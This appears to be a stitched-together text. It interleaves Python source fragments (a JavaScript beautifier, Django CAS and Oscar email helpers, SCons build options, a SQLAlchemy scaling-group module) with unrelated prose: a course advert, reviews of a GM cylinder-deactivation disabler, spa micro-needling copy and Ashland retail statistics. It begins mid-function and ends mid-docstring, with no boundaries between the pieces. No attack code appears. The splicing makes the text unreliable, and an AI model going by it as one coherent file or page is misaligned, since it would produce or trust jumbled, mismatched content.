                intvalue = int(tokens[i].string[0:1])
                lastToken = tokens[i]
            except Exception:
                newTokens.append(tokens[i])
        else:
            newTokens.append(tokens[i])
    if(lastToken):
        newTokens.append(lastToken)
    # BUGFIX: guard the final append -- tokenize('') used to raise IndexError
    # because tokens[-1] was taken from an empty list.
    if(len(tokens) > 0):
        newTokens.append(tokens[len(tokens) - 1])
    tokens = newTokens

    # simplify the regex tokens into single tokens
    newTokens = []
    startIndex = -1
    endIndex = -1
    string = ''
    i = 0
    while(i < len(tokens)):
        if(startIndex > -1):
            tkn = tokens[i]
            # BUGFIX: the whitespace test used to read `tkn == 0` (comparing
            # the token object itself, always False); `tkn.index == 0` (a
            # space token) was clearly intended.
            if(not string.endswith("\\") and (
                    (tkn.type == TYPE_SEMICOLON) or
                    (tkn.type == TYPE_BRACE and tkn.index == 1) or
                    (tkn.type == TYPE_WHITESPACE and tkn.index == 0))):
                if(endIndex > -1):
                    # merge everything between the two '/' into one token
                    string = ''
                    for j in range(startIndex, endIndex + 1):
                        string += tokens[j].string
                    newTokens.append(token(string))
                    i = endIndex
                else:
                    # never saw a closing '/': rewind and emit as-is
                    i = startIndex
                    newTokens.append(tokens[i])
                startIndex = -1
                endIndex = -1
                string = ''
            elif(tkn.type == TYPE_BINOPERATOR and tkn.string == '/'):
                endIndex = i
                string += tkn.string
            else:
                string += tkn.string
        elif(i > 0 and tokens[i].type == TYPE_BINOPERATOR and tokens[i].string == '/'):
            # check if the previous is not an identifier, not an operator
            j = i - 1
            prev = tokens[j]
            while(prev.type == TYPE_WHITESPACE and j > 0):
                j -= 1
                prev = tokens[j]
            # BUGFIX: `prev_index` was an undefined name (NameError at
            # runtime); `prev.index` was intended.
            if((prev.type == TYPE_BINOPERATOR and prev.string == '=') or
               (prev.type == TYPE_BRACE and prev.index == 0) or
               (prev.type == TYPE_COMMA and prev.index == 0)):
                startIndex = i
                string = tokens[i].string
            else:
                newTokens.append(tokens[i])
        else:
            newTokens.append(tokens[i])
        i += 1
    tokens = newTokens

    # now let's simplify the whitespace tokens into single ones
    # (spaces are dropped entirely; at most two consecutive newlines survive)
    newTokens = []
    lastToken = False
    for i in range(len(tokens)):
        if(lastToken):
            if(lastToken.index == 0):
                if(tokens[i].type == TYPE_WHITESPACE):
                    if(tokens[i].index == 1):
                        lastToken = tokens[i]
                else:
                    newTokens.append(tokens[i])
                    lastToken = False
            elif(lastToken.index == 1):
                if(tokens[i].type == TYPE_WHITESPACE):
                    if(tokens[i].index == 1):
                        if(len(lastToken.string) < 2):
                            lastToken.string += tokens[i].string
                else:
                    newTokens.append(lastToken)
                    newTokens.append(tokens[i])
                    lastToken = False
        elif(tokens[i].type == TYPE_WHITESPACE):
            lastToken = tokens[i]
        else:
            newTokens.append(tokens[i])
    if(lastToken):
        newTokens.append(lastToken)
    tokens = newTokens

    # now let's switch curly and newline tokens so '{' ends the previous line
    for i in range(len(tokens) - 1):
        if(tokens[i].type == TYPE_WHITESPACE):
            if(tokens[i + 1].type == TYPE_CURLY and tokens[i + 1].index == 0):
                if(i < len(tokens) - 2):
                    if(tokens[i + 2].type == TYPE_WHITESPACE):
                        tokens.remove(tokens[i + 2])
                if(i == 0 or tokens[i - 1].type != TYPE_COMMENT):
                    tmp = tokens[i]
                    tokens[i] = tokens[i + 1]
                    tokens[i + 1] = tmp
        elif(tokens[i].type == TYPE_CURLY and tokens[i].index == 0):
            if(tokens[i + 1].type != TYPE_WHITESPACE and
               not(tokens[i + 1].type == TYPE_CURLY and tokens[i + 1].index == 1)):
                tokens.insert(i + 1, token('\n', TYPE_WHITESPACE, 1))
        elif(tokens[i + 1].type == TYPE_CURLY and tokens[i + 1].index == 1):
            # BUGFIX: this used to test `tokens[i+1].index == 0`, which is
            # always False inside this branch (we just established it is 1);
            # the symmetric intent is "previous token is an opening curly".
            if(tokens[i].type != TYPE_WHITESPACE and
               not(tokens[i].type == TYPE_CURLY and tokens[i].index == 0)):
                tokens.insert(i + 1, token('\n', TYPE_WHITESPACE, 1))
        if(i == len(tokens) - 2):
            break

    # bracket balance bookkeeping (the comma-splitting pass below is disabled)
    curlyCount = 0
    braceCount = 0
    for i in range(len(tokens) - 1):
        if(tokens[i].type == TYPE_CURLY):
            if(tokens[i].index == 0):
                curlyCount += 1
            else:
                curlyCount -= 1
        elif(tokens[i].type == TYPE_BRACE):
            if(tokens[i].index == 0):
                braceCount += 1
            else:
                braceCount -= 1
        #elif(tokens[i].type == TYPE_COMMA and tokens[i].index == 0):
        #    if(braceCount <= curlyCount):
        #        tokens.insert(i+1,token('\n',TYPE_WHITESPACE,1))

    return tokens


def stringify(tokens, extension='js'):
    """Render a token list back into formatted source text.

    *extension* tweaks a few rules (e.g. 'kl' puts a space after every
    TYPE_FUNCTION keyword).  The indent unit is two spaces.
    """
    lines = []
    line = []
    # loop over all tokens and put them in lines
    for i in range(len(tokens)):
        if(tokens[i].type == TYPE_WHITESPACE):
            if(tokens[i].index == 1):
                lines.append(line)
                # a double newline becomes one intentionally blank line
                if(len(tokens[i].string) > 1):
                    lines.append([token('', TYPE_WHITESPACE)])
                line = []
                continue
        line.append(tokens[i])
    if(len(line) > 0):
        lines.append(line)

    strings = []
    tabs = ''
    globalCurlyCount = 0
    globalBraceCount = 0
    globalBracketCount = 0
    globalQuoteCount = 0
    entryQuote = 0
    history = []
    for j in range(len(lines)):
        line = lines[j]
        curlyCount = 0
        braceCount = 0
        bracketCount = 0
        string = ''

        # check if we have a single control line without curly:
        # find the closest previous non-empty line
        prevLine = False
        if(j > 0):
            k = j - 1
            while(k >= 0):
                if(len(lines[k]) > 0 and
                   (len(lines[k]) > 1 or lines[k][0].type != TYPE_WHITESPACE)):
                    prevLine = lines[k]
                    break
                k -= 1

        # pre-pass: net bracket balance of this line decides the indent delta
        for i in range(len(line)):
            if(line[i].type == TYPE_CURLY):
                if(line[i].index == 0):
                    globalCurlyCount += 1
                    curlyCount += 1
                else:
                    if(curlyCount == 0):
                        string = string[2:100000]
                    globalCurlyCount -= 1
                    curlyCount -= 1
            if(line[i].type == TYPE_BRACE):
                if(line[i].index == 0):
                    globalBraceCount += 1
                    braceCount += 1
                else:
                    if(braceCount == 0):
                        string = string[2:100000]
                    globalBraceCount -= 1
                    braceCount -= 1
            if(line[i].type == TYPE_BRACKET):
                if(line[i].index == 0):
                    globalBracketCount += 1
                    bracketCount += 1
                else:
                    if(bracketCount == 0):
                        string = string[2:100000]
                    globalBracketCount -= 1
                    bracketCount -= 1

        tabCount = curlyCount + braceCount + bracketCount
        tabBefore = True
        if(prevLine):
            # a control statement without '{' indents exactly one extra line
            if(prevLine[0].type == TYPE_CONTROL and
               prevLine[0].string != 'case' and prevLine[0].string != 'default'):
                lastToken = prevLine[len(prevLine) - 1]
                if(lastToken.type != TYPE_CURLY or lastToken.index > 0):
                    string += '  '
            elif(prevLine[len(prevLine) - 1].type == TYPE_BINOPERATOR and tabCount <= 0):
                # continuation line of a broken expression
                tabBefore = False
                string += '  '

        if(tabCount < 0 and tabBefore):
            for i in range(abs(tabCount)):
                tabs = tabs[2:10000]
        string += tabs
        if(len(line) > 1):
            firstToken = line[0]
            lastToken = line[len(line) - 1]
            if(firstToken.index == 1 and
               (firstToken.type == TYPE_CURLY or firstToken.type == TYPE_BRACE or
                firstToken.type == TYPE_BRACKET) and
               lastToken.index == 0 and
               (lastToken.type == TYPE_CURLY or lastToken.type == TYPE_BRACE or
                lastToken.type == TYPE_BRACKET)):
                string = string[2:10000]
        elif(len(line) == 1 and line[0].type == TYPE_CURLY and line[0].index == 0):
            string = string[2:10000]
        if(tabCount < 0 and not tabBefore):
            for i in range(abs(tabCount)):
                tabs = tabs[2:10000]
        if(tabCount > 0):
            for i in range(tabCount):
                tabs += '  '

        # emit the tokens of this line with spacing rules per token type
        for i in range(0, len(line)):
            if(line[i].type == TYPE_BRACE or line[i].type == TYPE_CURLY or
               line[i].type == TYPE_BRACKET):
                if(line[i].index == 0):
                    history.append(line[i].string)
                else:
                    if(line[i].type == TYPE_CURLY):
                        # closing a switch body: drop the extra 'case' indent
                        if(len(history) > 2 and history[len(history) - 1] == 'case'):
                            tabs = tabs[2:10000]
                            string = string[2:10000]
                            history.pop()
                    if(len(history) > 0):
                        history.pop()
            if(line[i].type == TYPE_COMMENT):
                string += line[i].string.strip()
                continue
            if(line[i].type == TYPE_CURLY):
                if(line[i].index == 0 and not string.endswith(' ') and
                   not string.endswith('[') and not string.endswith('(')):
                    string += ' ' + line[i].string
                    continue
            if(line[i].type == TYPE_FUNCTION):
                # NOTE(review): assumes a token follows the 'function'/'operator'
                # keyword on the same line; a trailing keyword would raise
                # IndexError -- behavior kept as-is.
                if(line[i + 1].type != TYPE_BRACE and
                   (line[i].string == 'function' or extension == 'kl')):
                    string += line[i].string + ' '
                    continue
            if(line[i].type == TYPE_BINOPERATOR):
                if(line[i].string == '-'):
                    # unary minus sticks to its operand
                    if(i == 0):
                        string += line[i].string
                        continue
                    if(line[i - 1].type != TYPE_IDENTIFIER and line[i - 1].index == 0):
                        string += line[i].string
                        continue
                if(not string.endswith(' ')):
                    if line[i].string == ":":
                        # only the ':' of a ternary gets surrounding spaces
                        if(len(history) > 0):
                            if(history[len(history) - 1] == '?'):
                                string += ' '
                                history.pop()
                    elif line[i].string == "?":
                        history.append('?')
                        string += ' '
                    elif line[i].string == "!":
                        if(not string.endswith('(')):
                            string += ' '
                    else:
                        string += ' '
                string += line[i].string
                if(i < len(line) - 1 and line[i].string != '!'):
                    string += ' '
                continue
            if(line[i].type == TYPE_COMMA and line[i].index == 0 and i < len(line) - 1):
                string += line[i].string + ' '
                continue
            if(line[i].type == TYPE_CONTROL):
                if(line[i].string == 'case' or line[i].string == 'default'):
                    if(len(history) > 0 and history[len(history) - 1] == 'case'):
                        string = string[2:10000]
                    else:
                        history.append('case')
                        tabs += '  '
                if(i < len(line) - 1 and
                   (line[i + 1].type == TYPE_BRACE or line[i + 1].type == TYPE_CONTROL or
                    line[i + 1].type == TYPE_COMMENT or line[i + 1].type == TYPE_IDENTIFIER)):
                    string += line[i].string + ' '
                else:
                    string += line[i].string
                continue
            if(line[i].type == TYPE_KEYWORD and
               (line[i].string == "var" or line[i].string == "#include")):
                string += line[i].string + ' '
                continue
            if(line[i].type == TYPE_KEYWORD and line[i].string == "return" and
               i < len(line) - 1 and line[i + 1].type != TYPE_SEMICOLON):
                string += line[i].string + ' '
                continue
            if(line[i].type == TYPE_IDENTIFIER and len(string) > 0 and
               not string.endswith(' ') and not string.endswith('.') and
               not string.endswith('(') and not string.endswith('[') and
               not string.endswith('{') and not string.endswith('!')):
                if(string.endswith('-') and not string[0:len(string) - 1].endswith(' ')):
                    string += line[i].string
                else:
                    string += ' ' + line[i].string
                continue
            if(line[i].type == TYPE_SEMICOLON and i < len(line) - 1 and
               line[i + 1].type != TYPE_WHITESPACE):
                string += line[i].string + ' '
                continue
            string += line[i].string

        if(len(string.strip()) == 0):
            strings.append('')
        else:
            strings.append(string)

    # now reindent the tabs, based on smallest indent possible
    counts = []
    for string in strings:
        count = 0
        while(string[count * 2:count * 2 + 1] == ' '):
            count += 1
        counts.append(count)

    def reindent(strings, counts, index):
        # pull over-indented runs (2+ levels deeper) back to one extra level
        if(strings[index] == ''):
            return
        count = counts[index]
        while(counts[index + 1] == count or strings[index + 1] == ''):
            index += 1
            if(index == len(counts) - 1):
                return
        if(counts[index + 1] > count + 1):
            highIndex = index + 1
            lowIndex = index + 1
            # we found a 2 tabbing or higher
            # now let's check if the next lower one is also my count
            while(counts[lowIndex] >= counts[highIndex] or strings[lowIndex] == ''):
                lowIndex += 1
                if(lowIndex == len(counts) - 1):
                    break
            if(counts[lowIndex] <= count):
                # fantastic, we can lower the tabs
                diff = count - counts[highIndex] + 1
                for i in range(highIndex, lowIndex):
                    counts[i] += diff

    for i in range(len(counts) - 1):
        reindent(strings, counts, i)
    for i in range(len(counts)):
        count = 0
        while(strings[i][count:count + 1] == ' '):
            count += 1
        newCount = counts[i] * 2
        strings[i] = strings[i][(count - newCount):100000]

    return '\n'.join(strings)


def parseJSFile(fileName):
    """Beautify a .js or .kl file in place."""
    # get the content ('with' guarantees the handles are closed)
    with open(fileName) as fp:
        content = fp.read()
    tokens = tokenize(content)
    # NOTE(review): the file extension is not forwarded to stringify(), so
    # .kl files are formatted with the 'js' rules -- confirm this is intended.
    string = stringify(tokens)
    if(not string.endswith('\n')):
        string += '\n'
    with open(fileName, 'w') as fp:
        fp.write(string)


def parseHTMLFile(fileName):
    """Beautify the first inline <script> block of an HTML file in place."""
    # get the content, normalizing tabs and line endings
    with open(fileName) as fp:
        lines = fp.read().replace('\t', '  ').replace('\r\n', '\n') \
                         .replace('\r', '\n').split('\n')
    prejscontent = []
    jscontent = []
    postjscontent = []
    insideJS = 0  # 0 = before script, 1 = inside script, 2 = after script
    for line in lines:
        stripped = line.lower().strip()
        if(insideJS == 0):
            if(stripped.startswith('<')):
                stripped = stripped[1:10000].strip()
                # only inline scripts (no src attribute) are beautified
                if(stripped.startswith('script') and stripped.find('src') == -1):
                    insideJS = 1
            prejscontent.append(line)
        elif(insideJS == 1):
            if(stripped.startswith('<')):
                insideJS = 2
                postjscontent.append(line)
            else:
                jscontent.append(line)
        else:
            postjscontent.append(line)
    tokens = tokenize('\n'.join(jscontent))
    string = stringify(tokens)
    string = '\n'.join(prejscontent) + '\n' + string + '\n' + '\n'.join(postjscontent)
    with open(fileName, 'w') as fp:
        fp.write(string)


def main():
    """Command line entry point: beautify every path given in sys.argv."""
    if(not sys.argv or len(sys.argv) == 0):
        raise(Exception("No files specified!"))
    arguments = []
    for arg in sys.argv:
        arguments.append(arg)
    if(len(arguments) <= 1):
        print("Run the tool with all paths to beautify!")
        return
    files = []
    # NOTE: glob matches are appended to 'arguments' while iterating it;
    # list iteration in CPython picks up the appended items, which is how
    # wildcard expansion is intended to work here.
    for arg in arguments:
        if(arg.find('*') != -1):
            matched = glob.glob(arg)
            for match in matched:
                arguments.append(match)
            continue
        for ft in fileTypes:
            if(arg.lower().endswith(ft)):
                if(os.path.exists(arg)):
                    files.append(arg)
                    break
                else:
                    # BUGFIX: the message previously lacked its closing quote
                    raise(Exception("The file '" + arg + "' does not exist!"))

    # parse each file
    for i in range(len(files)):
        extension = files[i].lower().rpartition('.')[2]
        if(extension == 'js' or extension == 'kl'):
            parseJSFile(files[i])
        elif(extension == 'html' or extension == 'htm'):
            parseHTMLFile(files[i])
        else:
            raise(Exception("Unsupported file format '" + extension + "'!"))
        print(str(i + 1) + " of " + str(len(files)) + " : beautified '" +
              files[i] + "' successfully.")


if __name__ == '__main__':
    main()
Do you also find yourself in an ever-changing business environment? In the midst of complex decision-making processes? And with expectations of constant peak performance? If so, this course is for you!
from .cas import CASClient
from django.conf import settings as django_settings
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.utils.six.moves import urllib_parse


def get_protocol(request):
    """Returns 'http' or 'https' for the request protocol"""
    return 'https' if request.is_secure() else 'http'


def get_redirect_url(request):
    """Redirects to referring page, or CAS_REDIRECT_URL if no referrer is
    set.
    """
    target = request.GET.get(REDIRECT_FIELD_NAME)
    if target:
        return target
    # No explicit "next" parameter: fall back to the referrer (or the
    # configured default when referrers are ignored or absent) ...
    if django_settings.CAS_IGNORE_REFERER:
        target = django_settings.CAS_REDIRECT_URL
    else:
        target = request.META.get('HTTP_REFERER',
                                  django_settings.CAS_REDIRECT_URL)
    # ... and strip this site's scheme://host prefix so the result is a
    # site-relative path.
    prefix = urllib_parse.urlunparse(
        (get_protocol(request), request.get_host(), '', '', '', ''),
    )
    if target.startswith(prefix):
        target = target[len(prefix):]
    return target


def get_service_url(request, redirect_to=None):
    """Generates application django service URL for CAS"""
    base = urllib_parse.urlunparse(
        (get_protocol(request), request.get_host(), request.path, '', '', ''),
    )
    # Append the post-login redirect target as a query parameter, re-using
    # any existing query string separator.
    separator = '&' if '?' in base else '?'
    query = urllib_parse.urlencode({
        REDIRECT_FIELD_NAME: redirect_to or get_redirect_url(request)
    })
    return base + separator + query


def get_cas_client(service_url=None):
    """
    initializes the CASClient according to
    the CAS_* settings
    """
    client_kwargs = {
        'service_url': service_url,
        'version': django_settings.CAS_VERSION,
        'server_url': django_settings.CAS_SERVER_URL,
        'extra_login_params': django_settings.CAS_EXTRA_LOGIN_PARAMS,
        'renew': django_settings.CAS_RENEW,
        'username_attribute': django_settings.CAS_USERNAME_ATTRIBUTE,
        'proxy_callback': django_settings.CAS_PROXY_CALLBACK,
    }
    return CASClient(**client_kwargs)
We can help! Our family of products can address your needs. A family of unique patented solutions! DYNAMIC FUEL MANAGEMENT (DFM) DISABLER All the Power, All the time! Keep your vehicle in all cylinder mode! For GM V8 engines with DFM. *IN TESTING* Check back in coming weeks for the release of this version! I have a flowmaster super 40 with dual outlets on my Silverado. The AFM Disabler has worked perfectly from day one. I am so happy not to deal with v4 anymore. My Camaro SS is like a brand new car now. No more shuddering vibration and annoying 4 banger exhaust noise. Thank you Range for my full time V8. Right on! Does what it is supposed to do. I still have a warranty and it’s nice to know I can just unplug it before taking it in. Bought this to shut down the AFM and it does just that. It got rid of the hesitation of switching between 8cyl and 4cyl mode. I recommend this to everyone I know that has a Suburban with AFM. Good communication and fast turn around. Thanks! I believe that Caitlin went above and beyond to help me with my current situation. After a few issues in the past she was very instrumental in resolving my situation. Completely satisfied! Awesome product! Does exactly what it says it should and is simple as it gets. Plug it in and go! Thanks! It took over 8,000 hours and more than 100,000 miles on the road to develop technology that customizes your vehicle to suit your driving needs.
import logging

from django.conf import settings
from django.contrib.auth.tokens import default_token_generator
from django.core.mail import EmailMessage, EmailMultiAlternatives
from django.core.urlresolvers import reverse
from django.utils.encoding import force_bytes
from django.utils.http import urlsafe_base64_encode

from oscar.core.loading import get_model

CommunicationEvent = get_model('order', 'CommunicationEvent')
Email = get_model('customer', 'Email')


class Dispatcher(object):
    """Sends communications (email, optionally SMS) to customers.

    ``messages`` dicts passed to the dispatch methods are expected to carry
    'subject', 'body', 'html' and 'sms' keys.
    """

    def __init__(self, logger=None):
        if not logger:
            logger = logging.getLogger(__name__)
        self.logger = logger

    # Public API methods

    def dispatch_direct_messages(self, recipient, messages):
        """
        Dispatch one-off messages to explicitly specified recipient(s).
        """
        if messages['subject'] and messages['body']:
            self.send_email_messages(recipient, messages)

    def dispatch_order_messages(self, order, messages, event_type=None,
                                **kwargs):
        """
        Dispatch order-related messages to the customer.

        Anonymous orders fall back to an explicit ``email_address`` kwarg or
        the order's guest email; registered users get the full user dispatch.
        A :class:`CommunicationEvent` is recorded when ``event_type`` is given.
        """
        if order.is_anonymous:
            if 'email_address' in kwargs:
                self.send_email_messages(kwargs['email_address'], messages)
            elif order.guest_email:
                self.send_email_messages(order.guest_email, messages)
            else:
                # No address available at all: nothing to send, no audit event
                return
        else:
            self.dispatch_user_messages(order.user, messages)

        # Create order communications event for audit
        if event_type is not None:
            CommunicationEvent._default_manager.create(
                order=order, event_type=event_type)

    def dispatch_user_messages(self, user, messages):
        """
        Send messages to a site user
        """
        if messages['subject'] and (messages['body'] or messages['html']):
            self.send_user_email_messages(user, messages)
        if messages['sms']:
            self.send_text_message(user, messages['sms'])

    # Internal

    def send_user_email_messages(self, user, messages):
        """
        Sends message to the registered user / customer and collects data
        in database
        """
        if not user.email:
            self.logger.warning("Unable to send email messages as user #%d has"
                                " no email address", user.id)
            return
        email = self.send_email_messages(user.email, messages)
        # Is user is signed in, record the event for audit
        if email and user.is_authenticated():
            Email._default_manager.create(user=user,
                                          subject=email.subject,
                                          body_text=email.body,
                                          body_html=messages['html'])

    def send_email_messages(self, recipient, messages):
        """
        Plain email sending to the specified recipient
        """
        if hasattr(settings, 'OSCAR_FROM_EMAIL'):
            from_email = settings.OSCAR_FROM_EMAIL
        else:
            from_email = None

        # Determine whether we are sending a HTML version too
        if messages['html']:
            email = EmailMultiAlternatives(messages['subject'],
                                           messages['body'],
                                           from_email=from_email,
                                           to=[recipient])
            email.attach_alternative(messages['html'], "text/html")
        else:
            email = EmailMessage(messages['subject'],
                                 messages['body'],
                                 from_email=from_email,
                                 to=[recipient])
        # Lazy %-style args instead of eager interpolation (logging idiom)
        self.logger.info("Sending email to %s", recipient)
        email.send()

        return email

    def send_text_message(self, user, event_type):
        # SMS delivery is deliberately left to subclasses/projects.
        raise NotImplementedError


def get_password_reset_url(user, token_generator=default_token_generator):
    """
    Generate a password-reset URL for a given user
    """
    kwargs = {
        'token': token_generator.make_token(user),
        'uidb64': urlsafe_base64_encode(force_bytes(user.id)),
    }
    return reverse('password-reset-confirm', kwargs=kwargs)


def normalise_email(email):
    """
    The local part of an email address is case-sensitive, the domain part
    isn't.  This function lowercases the host and should be used in all email
    handling.
    """
    clean_email = email.strip()
    if '@' in clean_email:
        # BUGFIX: split('@') raised ValueError for addresses containing more
        # than one '@' (legal in quoted local parts); split only on the last
        # one, which always separates local part from host.
        local, host = clean_email.rsplit('@', 1)
        return local + '@' + host.lower()
    return clean_email
Micro-Needling (also known as Collagen Induction Therapy) is an innovative skin rejuvenation treatment that can improve the overall appearance of the skin with minimal down-time. The micro-needling process involves the creation of microscopic channels through the surface of the skin, which leads to the formation of new tissue and releases the skin’s natural growth factors, which promote scar and hyperpigmentation repair and healing. This can be enhanced by application of platelet-rich plasma (PRP), growth factor gels, kojic acid, and hyaluronic acid based skin rejuvenation treatments. By creating minor skin injury during the procedure, the skin’s natural healing process initiates the production of new collagen and elastin fibers that thicken the skin and reduce the appearance of wrinkles, acne scarring, sun damage, and stretch marks. WHAT CONDITIONS CAN MICRO-NEEDLING IMPROVE? As we age, our skin gets dry and dull and signs of sun damage commonly appear over time. Microdermabrasion reverses the signs of aging to deliver supple, glowing skin in just one treatment. During the treatment, a top layer of the skin is exfoliated and unwanted dead cells are removed, leaving the skin supple and glowing. Microdermabrasion is a safe, well-tested procedure that can be used in combination with Photofacial, Chemical Peels and Micro-needling. It is a resurfacing procedure that gently exfoliates the top layer of skin and removes the unwanted dead cells by vacuuming them away. With this top layer of dead skin removed, the skin looks and feels smoother. Microdermabrasion promotes better circulation in the face and significantly enhances collagen production, responsible for cell and skin renewal.
#######################################################################
# Common SCons code
#
# Detects the host platform/machine and exposes AddOptions() so that each
# SConstruct can register the shared build options with sensible defaults.

import os
import os.path
import re
import subprocess
import sys
import platform as _platform

import SCons.Script.SConscript


#######################################################################
# Defaults

host_platform = _platform.system().lower()
if host_platform.startswith('cygwin'):
    # platform.system() reports e.g. 'cygwin_nt-6.1'; normalize it
    host_platform = 'cygwin'

# Search sys.argv[] for a "platform=foo" argument since we don't have
# an 'env' variable at this point.
if 'platform' in SCons.Script.ARGUMENTS:
    target_platform = SCons.Script.ARGUMENTS['platform']
else:
    target_platform = host_platform

# Map the many spellings of a CPU architecture onto our canonical names.
_machine_map = {
    'x86': 'x86',
    'i386': 'x86',
    'i486': 'x86',
    'i586': 'x86',
    'i686': 'x86',
    'BePC': 'x86',
    'Intel': 'x86',
    'ppc': 'ppc',
    'BeBox': 'ppc',
    'BeMac': 'ppc',
    'AMD64': 'x86_64',
    'x86_64': 'x86_64',
    'sparc': 'sparc',
    'sun4u': 'sparc',
}

# find host_machine value
if 'PROCESSOR_ARCHITECTURE' in os.environ:
    host_machine = os.environ['PROCESSOR_ARCHITECTURE']
else:
    host_machine = _platform.machine()
host_machine = _machine_map.get(host_machine, 'generic')

default_machine = host_machine
default_toolchain = 'default'

if target_platform == 'windows' and host_platform != 'windows':
    # Cross-compiling for Windows: assume 32-bit MinGW
    default_machine = 'x86'
    default_toolchain = 'crossmingw'

# find default_llvm value
if 'LLVM' in os.environ:
    default_llvm = 'yes'
else:
    default_llvm = 'no'
    # Probe for llvm-config on the PATH; enable LLVM when it works.
    try:
        if target_platform != 'windows' and \
           subprocess.call(['llvm-config', '--version'],
                           stdout=subprocess.PIPE) == 0:
            default_llvm = 'yes'
    except Exception:
        # BUGFIX: was a bare `except:`, which also swallowed SystemExit and
        # KeyboardInterrupt.  Missing llvm-config (OSError) and friends are
        # still treated as "no LLVM".
        pass


#######################################################################
# Common options

def AddOptions(opts):
    """Register the shared build options on *opts* (an SCons option/variable
    container), coping with both old and new SCons module layouts."""
    try:
        from SCons.Variables.BoolVariable import BoolVariable as BoolOption
    except ImportError:
        from SCons.Options.BoolOption import BoolOption
    try:
        from SCons.Variables.EnumVariable import EnumVariable as EnumOption
    except ImportError:
        from SCons.Options.EnumOption import EnumOption
    opts.Add(EnumOption('build', 'build type', 'debug',
                        allowed_values=('debug', 'checked', 'profile',
                                        'release')))
    opts.Add(BoolOption('verbose', 'verbose output', 'no'))
    opts.Add(EnumOption('machine', 'use machine-specific assembly code',
                        default_machine,
                        allowed_values=('generic', 'ppc', 'x86', 'x86_64')))
    opts.Add(EnumOption('platform', 'target platform', host_platform,
                        allowed_values=('cygwin', 'darwin', 'freebsd', 'haiku',
                                        'linux', 'sunos', 'windows')))
    opts.Add(BoolOption('embedded', 'embedded build', 'no'))
    opts.Add('toolchain', 'compiler toolchain', default_toolchain)
    opts.Add(BoolOption('gles', 'EXPERIMENTAL: enable OpenGL ES support',
                        'no'))
    opts.Add(BoolOption('llvm', 'use LLVM', default_llvm))
    opts.Add(BoolOption('openmp', 'EXPERIMENTAL: compile with openmp (swrast)',
                        'no'))
    opts.Add(BoolOption('debug', 'DEPRECATED: debug build', 'yes'))
    opts.Add(BoolOption('profile', 'DEPRECATED: profile build', 'no'))
    opts.Add(BoolOption('quiet', 'DEPRECATED: profile build', 'yes'))
    opts.Add(BoolOption('texture_float',
                        'enable floating-point textures and renderbuffers',
                        'no'))
    if host_platform == 'windows':
        opts.Add(EnumOption('MSVS_VERSION', 'MS Visual C++ version', None,
                            allowed_values=('7.1', '8.0', '9.0')))
The retail industry in Ashland represents 1,423 employees and 157 firms. The average annual payroll from 2013, $26,515, is 97% of the state average for retail payroll. This industry is expansive and diverse, representing retail businesses in clothing, auto, and health, just to name a few. Ashland retailers are supported by a community of residents who are dedicated to shopping local and a large visitor base hoping to return home with a treat from Ashland.
"""Database tables and GraphQL types/mutations for scaling groups.

A scaling group names a pool of agents together with the driver and
scheduler (plus their options) used to dispatch work onto that pool.
Access to a scaling group is granted per domain, per user group, and
per keypair via separate association tables.
"""
from __future__ import annotations

from typing import (
    Any,
    Dict,
    Sequence,
    Set,
    TYPE_CHECKING,
    Union,
)
import uuid

import sqlalchemy as sa
from sqlalchemy.dialects import postgresql as pgsql
from sqlalchemy.engine.row import Row
from sqlalchemy.ext.asyncio import AsyncConnection as SAConnection

import graphene
from graphene.types.datetime import DateTime as GQLDateTime

from .base import (
    metadata,
    simple_db_mutate,
    simple_db_mutate_returning_item,
    set_if_set,
    batch_result,
)
from .group import resolve_group_name_or_id
from .user import UserRole

if TYPE_CHECKING:
    from .gql import GraphQueryContext

__all__: Sequence[str] = (
    # table defs
    'scaling_groups',
    'sgroups_for_domains',
    'sgroups_for_groups',
    'sgroups_for_keypairs',
    # functions
    'query_allowed_sgroups',
    'ScalingGroup',
    'CreateScalingGroup',
    'ModifyScalingGroup',
    'DeleteScalingGroup',
    'AssociateScalingGroupWithDomain',
    'AssociateScalingGroupWithUserGroup',
    'AssociateScalingGroupWithKeyPair',
    'DisassociateScalingGroupWithDomain',
    'DisassociateScalingGroupWithUserGroup',
    'DisassociateScalingGroupWithKeyPair',
)

# Primary table: one row per scaling group, keyed by its (unique) name.
scaling_groups = sa.Table(
    'scaling_groups', metadata,
    sa.Column('name', sa.String(length=64), primary_key=True),
    sa.Column('description', sa.String(length=512)),
    # Inactive groups are excluded from scheduling (see query_allowed_sgroups).
    sa.Column('is_active', sa.Boolean, index=True, default=True),
    sa.Column('created_at', sa.DateTime(timezone=True),
              server_default=sa.func.now()),
    # Driver/scheduler plugin names with their JSON option blobs.
    sa.Column('driver', sa.String(length=64), nullable=False),
    sa.Column('driver_opts', pgsql.JSONB(), nullable=False, default={}),
    sa.Column('scheduler', sa.String(length=64), nullable=False),
    sa.Column('scheduler_opts', pgsql.JSONB(), nullable=False, default={}),
)


# When scheduling, we take the union of allowed scaling groups for
# each domain, group, and keypair.
# Association tables granting scaling-group access to domains, user groups,
# and keypairs.  Both sides cascade on rename/delete of the referenced row.
sgroups_for_domains = sa.Table(
    'sgroups_for_domains', metadata,
    sa.Column('scaling_group',
              sa.ForeignKey('scaling_groups.name',
                            onupdate='CASCADE', ondelete='CASCADE'),
              index=True, nullable=False),
    sa.Column('domain',
              sa.ForeignKey('domains.name',
                            onupdate='CASCADE', ondelete='CASCADE'),
              index=True, nullable=False),
    sa.UniqueConstraint('scaling_group', 'domain', name='uq_sgroup_domain'),
)

sgroups_for_groups = sa.Table(
    'sgroups_for_groups', metadata,
    sa.Column('scaling_group',
              sa.ForeignKey('scaling_groups.name',
                            onupdate='CASCADE', ondelete='CASCADE'),
              index=True, nullable=False),
    sa.Column('group',
              sa.ForeignKey('groups.id',
                            onupdate='CASCADE', ondelete='CASCADE'),
              index=True, nullable=False),
    sa.UniqueConstraint('scaling_group', 'group', name='uq_sgroup_ugroup'),
)

sgroups_for_keypairs = sa.Table(
    'sgroups_for_keypairs', metadata,
    sa.Column('scaling_group',
              sa.ForeignKey('scaling_groups.name',
                            onupdate='CASCADE', ondelete='CASCADE'),
              index=True, nullable=False),
    sa.Column('access_key',
              sa.ForeignKey('keypairs.access_key',
                            onupdate='CASCADE', ondelete='CASCADE'),
              index=True, nullable=False),
    sa.UniqueConstraint('scaling_group', 'access_key', name='uq_sgroup_akey'),
)


async def query_allowed_sgroups(
    db_conn: SAConnection,
    domain_name: str,
    group: Union[uuid.UUID, str],
    access_key: str,
) -> Sequence[Row]:
    """
    Return the *active* scaling-group rows usable by the given scope.

